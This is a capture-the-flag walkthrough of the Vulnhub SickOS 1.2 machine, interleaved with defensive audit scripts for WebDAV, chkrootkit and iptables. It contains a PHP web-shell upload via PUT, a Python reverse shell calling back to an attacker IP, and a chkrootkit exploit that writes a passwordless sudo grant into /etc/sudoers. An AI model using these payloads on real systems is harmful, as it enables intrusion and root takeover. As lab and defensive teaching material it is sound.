SICK OS v1.2 Walkthrough

Vulnhub machine SICK OS 1.2 Walkthrough (OSCP friendly and no Metasploit)


We start with nmap and find only two open ports: SSH and HTTP.

# Nmap 7.70 scan initiated Sat Aug  3 20:02:23 2019 as: nmap -sC -sV -p- -oN nmap 192.168.78.144
Nmap scan report for 192.168.78.144
Host is up (0.0015s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 66:8c:c0:f2:85:7c:6c:c0:f6:ab:7d:48:04:81:c2:d4 (DSA)
|   2048 ba:86:f5:ee:cc:83:df:a6:3f:fd:c1:34:bb:7e:62:ab (RSA)
|_  256 a1:6c:fa:18:da:57:1d:33:2c:52:e4:ec:97:e2:9e:af (ECDSA)
80/tcp open  http    lighttpd 1.4.28
|_http-server-header: lighttpd/1.4.28
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:CD:1F:EC (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Aug  3 20:04:24 2019 -- 1 IP address (1 host up) scanned in 120.72 seconds

Enumerate both services.
SSH is OpenSSH 5.9p1; searching for an exploit for it turns up nothing for this specific version.
Check the HTTP service with nikto, dirb and every other tool you can think of until you find a lead.

-----------------
DIRB v2.22
By The Dark Raver
-----------------

OUTPUT_FILE: dirb
START_TIME: Tue Aug  6 14:04:42 2019
URL_BASE: http://192.168.78.144/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.78.144/ ----
+ http://192.168.78.144/index.php (CODE:200|SIZE:163)
==> DIRECTORY: http://192.168.78.144/test/

---- Entering directory: http://192.168.78.144/test/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Aug  6 14:04:51 2019
DOWNLOADED: 4612 - FOUND: 1

Dirb gives us /test.
From here we are somewhat lost, so let's find out more about the web server.
Check the HTTP methods with the nmap NSE script.

nmap --script http-methods 192.168.78.144

Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-07 06:29 EDT
Nmap scan report for 192.168.78.144
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
MAC Address: 00:0C:29:CD:1F:EC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 18.51 seconds

Checking the OPTIONS method further.

root@kali:~/vulnhub/sickos2# curl -X OPTIONS -v 192.168.78.144/test
*   Trying 192.168.78.144...
* TCP_NODELAY set
* Connected to 192.168.78.144 (192.168.78.144) port 80 (#0)
> OPTIONS /test HTTP/1.1
> Host: 192.168.78.144
> User-Agent: curl/7.60.0
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
< Location: http://192.168.78.144/test/
< Content-Length: 0
< Date: Wed, 07 Aug 2019 10:30:53 GMT
< Server: lighttpd/1.4.28
<
* Connection #0 to host 192.168.78.144 left intact

We have the PUT method available, so let's try it.

curl -v -X PUT -d '<?php echo system($_GET["cmd"]); ?>' http://192.168.78.144/test/star.php

We would have used a POST request to upload or create the file if the PUT method had not worked.
Checking the /test URL, we find our new page star.php. Let's get a shell.
I tried several reverse-shell methods one by one and found the Python reverse shell working on port 8080. It failed on some ports, so it seems only a few are allowed; I checked which ports were open for communication by starting a web server on my machine and fetching it with wget from the target.

http://192.168.78.144/test/star.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.78.135%22,8080));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

We got a shell as user 'www-data' with this command.
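The OPTIONS reply above is what a defender should be looking for during a web-server review: a document root that advertises WebDAV write methods lets anyone create files in it. The following audit check is an added example, not code from this walkthrough or from lighttpd; it parses a raw OPTIONS response, flags the write-capable methods, and runs offline against a sample response constructed from the curl output shown above (the PLAIN_RESPONSE sample is likewise constructed to show what a read-only root should answer).

```python
"""Audit an HTTP OPTIONS response for write-capable WebDAV methods.

Added example, not code from the walkthrough or from lighttpd. Both sample
responses are constructed so the check runs offline; feed `audit_options`
the raw text of a real response to reuse it.
"""
from typing import Dict, List

# Methods that let a client create, change or delete server-side content.
# A path reachable without authentication should never advertise these.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY",
                 "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample: the reply lighttpd gave for OPTIONS /test above.
DAV_RESPONSE = (
    "HTTP/1.1 301 Moved Permanently\r\n"
    "DAV: 1,2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK\r\n"
    "Location: http://192.168.78.144/test/\r\n"
    "Content-Length: 0\r\n"
    "Server: lighttpd/1.4.28\r\n"
    "\r\n"
)

# Constructed sample of what a read-only document root should answer.
PLAIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: GET, HEAD, POST, OPTIONS\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Return the response headers with lower-cased names (status line dropped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def allowed_methods(raw: str) -> List[str]:
    """Methods listed in the Allow header, upper-cased, in server order."""
    allow = parse_headers(raw).get("allow", "")
    return [m.strip().upper() for m in allow.split(",") if m.strip()]


def audit_options(raw: str) -> Dict[str, object]:
    """Classify one OPTIONS response: is WebDAV on, which write methods show."""
    headers = parse_headers(raw)
    write = sorted(WRITE_METHODS.intersection(allowed_methods(raw)))
    return {
        "webdav": "dav" in headers,
        "write_methods": write,
        "severity": "high" if write else "ok",
    }


if __name__ == "__main__":
    for name, sample in (("/test", DAV_RESPONSE), ("read-only root", PLAIN_RESPONSE)):
        print(name, audit_options(sample))
```

On lighttpd the fix is to not enable mod_webdav on a public path at all, or, where WebDAV reads are wanted, to set `webdav.is-readonly = "enable"` for that location so the Allow header shrinks back to read-only methods and this check reports `ok`.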
Looking for privilege escalation, I tried multiple kernel exploits for the 3.11 kernel, but none worked.
Running a privilege-escalation checker script, I found a cron job running chkrootkit as root. There is a local privilege-escalation exploit for chkrootkit version 0.49. We can check the version with the command:
chkrootkit -V
The version of chkrootkit on the target is 0.49. One more condition of this exploit is that /tmp should be noexec, and the priv-esc script had already told us this. So the system meets all the conditions; let's use the exploit.
exploits/linux/local/33899.txt
As per the exploit, we need to create a file named 'update' in /tmp, put our code in it, make it executable and wait for the cron job to run it.
The code I wrote into the update file is:

echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update

Since this runs as root, it makes the sudoers file writable, grants www-data the right to run all sudo commands without a password, and then restores the permissions the sudoers file had.
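From the defender's side, every step of this escalation leaves something checkable: an affected chkrootkit release, a root cron job that runs it, an executable /tmp/update, and sudoers entries that keep growing each time the job fires. The audit below is an added example, not code from this walkthrough, from chkrootkit or from any priv-esc checker script. The version banner, crontab and sudoers text are constructed samples, the /tmp check runs against a temporary directory so nothing on the host is touched, and the banner format `chkrootkit version X.Y` is an assumption about what `chkrootkit -V` prints.

```python
"""Check a host for the conditions the chkrootkit escalation above relies on.

Added example, not code from the walkthrough, chkrootkit or any checker
script. All inputs are constructed samples; `demo_audit` plants a harmless
stand-in file in a temporary directory to exercise the /tmp check.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List, Tuple

VERSION_BANNER = "chkrootkit version 0.49"  # assumed `chkrootkit -V` format
SYSTEM_CRONTAB = """\
# /etc/crontab: system-wide crontab (constructed sample)
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/3 *   * * *   root    /usr/sbin/chkrootkit
"""
SUDOERS = """\
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
www-data ALL=NOPASSWD: ALL
www-data ALL=NOPASSWD: ALL
www-data ALL=NOPASSWD: ALL
"""


def chkrootkit_version(banner: str) -> str:
    """Pull the version number out of the `chkrootkit -V` banner."""
    m = re.search(r"version\s+(\d+(?:\.\d+)+)", banner)
    return m.group(1) if m else ""


def chkrootkit_affected(version: str) -> bool:
    """Releases up to 0.49 execute /tmp/update as root; 0.50 fixed it."""
    parts = tuple(int(p) for p in version.split(".")) if version else ()
    return bool(parts) and parts < (0, 50)


def root_cron_running_chkrootkit(crontab: str) -> List[str]:
    """System-crontab lines (m h dom mon dow user command) running chkrootkit as root."""
    hits = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 6)
        if len(fields) == 7 and fields[5] == "root" and "chkrootkit" in fields[6]:
            hits.append(line)
    return hits


def update_file_status(tmp_dir: str) -> Tuple[bool, bool]:
    """(exists, executable) for <tmp_dir>/update, the path chkrootkit 0.49 runs."""
    path = os.path.join(tmp_dir, "update")
    if not os.path.exists(path):
        return False, False
    mode = os.stat(path).st_mode
    return True, bool(mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))


def passwordless_all(sudoers: str) -> Dict[str, int]:
    """Count `NOPASSWD: ALL` grants per principal; repeats show the job re-ran."""
    counts: Dict[str, int] = {}
    for line in sudoers.splitlines():
        m = re.match(r"^(\S+)\s+ALL\s*=.*NOPASSWD:\s*ALL\s*$", line.strip())
        if m:
            counts[m.group(1)] = counts.get(m.group(1), 0) + 1
    return counts


def audit(banner: str, crontab: str, sudoers: str, tmp_dir: str) -> List[str]:
    """Human-readable findings; an empty list means none of the conditions hold."""
    findings = []
    version = chkrootkit_version(banner)
    if chkrootkit_affected(version):
        findings.append(f"chkrootkit {version} is affected (fixed in 0.50)")
    for line in root_cron_running_chkrootkit(crontab):
        findings.append(f"root cron runs chkrootkit: {line}")
    exists, executable = update_file_status(tmp_dir)
    if exists:
        findings.append(f"{tmp_dir}/update present (executable={executable}); inspect and remove")
    for user, n in passwordless_all(sudoers).items():
        if user != "root":
            findings.append(f"sudoers grants {user} passwordless ALL ({n} entries)")
    return findings


def demo_audit() -> List[str]:
    """Run the audit on the constructed samples plus a planted stand-in update file."""
    with tempfile.TemporaryDirectory() as tmp:
        planted = os.path.join(tmp, "update")
        with open(planted, "w") as fh:
            fh.write("#!/bin/sh\n")  # constructed stand-in, never executed here
        os.chmod(planted, 0o755)
        return audit(VERSION_BANNER, SYSTEM_CRONTAB, SUDOERS, tmp)


if __name__ == "__main__":
    for finding in demo_audit():
        print("-", finding)
```

The repeated sudoers lines are the useful forensic detail: each `(root) NOPASSWD: ALL` entry is one cron run after the file was planted, so the count gives a rough timeline. Running the audit for real means passing the host's actual `chkrootkit -V` output, `/etc/crontab` (and `/etc/cron.d/*`), `/etc/sudoers` and `/tmp` in place of the samples.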

After a while I checked the sudo permissions: our code had been executed and we had full sudo rights.

www-data@ubuntu:/etc$ sudo -l
Matching Defaults entries for www-data on this host:
    env_reset,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
    (root) NOPASSWD: ALL
www-data@ubuntu:/etc$ sudo su
root@ubuntu:/etc# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/etc# whoami;hostname
root
ubuntu

root@ubuntu:/etc# cd /root
root@ubuntu:~# ls
304d840d52840689e0ab0af56d6d3a18-chkrootkit-0.49.tar.gz  chkrootkit-0.49
7d03aaa2bf93d80040f3f22ec6ad9d5a.txt                     newRule
root@ubuntu:~# cat 7d03aaa2bf93d80040f3f22ec6ad9d5a.txt
WoW! If you are viewing this, You have "Sucessfully!!" completed SickOs1.2, the challenge is more focused on elimination of tool in real scenarios where tools can be blocked during an assesment and thereby fooling tester(s), gathering more information about the target using different methods, though while developing many of the tools were limited/completely blocked, to get a feel of Old School and testing it manually.

Thanks for giving this try.

@vulnhub: Thanks for hosting this UP!.

The newRule file has the details of ports that are blocked by iptables.

root@ubuntu:~# cat newRule
# Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
# Completed on Mon Apr 25 22:48:24 2016
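The newRule file explains the earlier observation that only a couple of outbound ports worked: with an OUTPUT policy of DROP, the host can only open connections to remote ports 8080 and 443. The small evaluator below is an added example, not code from the walkthrough; RULES is the file content printed above, embedded as a constant, and the model understands only what that file uses (chain policies, `-p tcp` with `--dport`/`--sport`, `-j ACCEPT`/`DROP`), so it is a teaching aid for reading a ruleset, not a substitute for `iptables -L -v -n` on the host.

```python
"""Model the ingress/egress policy of the newRule iptables-save dump above.

Added example, not code from the walkthrough. Handles only the rule features
present in that file; first matching rule wins, otherwise the chain policy.
"""
from typing import Dict, List, NamedTuple, Optional, Tuple

# Verbatim rules from the newRule file printed above (comment lines dropped).
RULES = """\
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
"""


class Rule(NamedTuple):
    chain: str
    dport: Optional[int]
    sport: Optional[int]
    target: str  # empty when the rule has no -j (it then only counts)


def parse_iptables_save(text: str) -> Tuple[Dict[str, str], List[Rule]]:
    """Return (chain policies, rules in file order) from iptables-save output."""
    policies: Dict[str, str] = {}
    rules: List[Rule] = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(":"):
            name, policy = line[1:].split()[:2]
            policies[name] = policy
        elif line.startswith("-A"):
            tok = line.split()
            dport = sport = None
            target = ""
            for i, t in enumerate(tok):
                if t == "--dport":
                    dport = int(tok[i + 1])
                elif t == "--sport":
                    sport = int(tok[i + 1])
                elif t == "-j":
                    target = tok[i + 1]
            rules.append(Rule(tok[1], dport, sport, target))
    return policies, rules


def verdict(chain: str, policies: Dict[str, str], rules: List[Rule],
            dport: int, sport: int) -> str:
    """Walk the chain: first rule whose port matches decides, else the policy."""
    for r in rules:
        if r.chain != chain or not r.target:
            continue
        if r.dport is not None and r.dport != dport:
            continue
        if r.sport is not None and r.sport != sport:
            continue
        return r.target
    return policies[chain]


def egress_allowed(remote_port: int, local_port: int = 40000, text: str = RULES) -> bool:
    """Can a TCP connection from this host (ephemeral local port) reach remote_port?"""
    policies, rules = parse_iptables_save(text)
    return verdict("OUTPUT", policies, rules, dport=remote_port, sport=local_port) == "ACCEPT"


def ingress_allowed(local_port: int, remote_port: int = 40000, text: str = RULES) -> bool:
    """Can a remote peer (ephemeral source port) reach local_port on this host?"""
    policies, rules = parse_iptables_save(text)
    return verdict("INPUT", policies, rules, dport=local_port, sport=remote_port) == "ACCEPT"


if __name__ == "__main__":
    for port in (22, 80, 443, 4444, 8080):
        print(f"port {port}: out={egress_allowed(port)} in={ingress_allowed(port)}")
```

Two things worth noting when reading the result. First, an egress policy of DROP with a short allow list is exactly the kind of control the box author describes as "tools being blocked", and it is cheap to deploy on real servers. Second, the `--sport 8080` and `--sport 443` INPUT rules are stateless stand-ins for "replies to connections we opened": they accept any inbound segment whose source port happens to be 8080 or 443, as `ingress_allowed(40000, remote_port=8080)` shows. The defensible form is a single `-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT`, which ties replies to connections the host actually initiated.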


 


 574r570rm
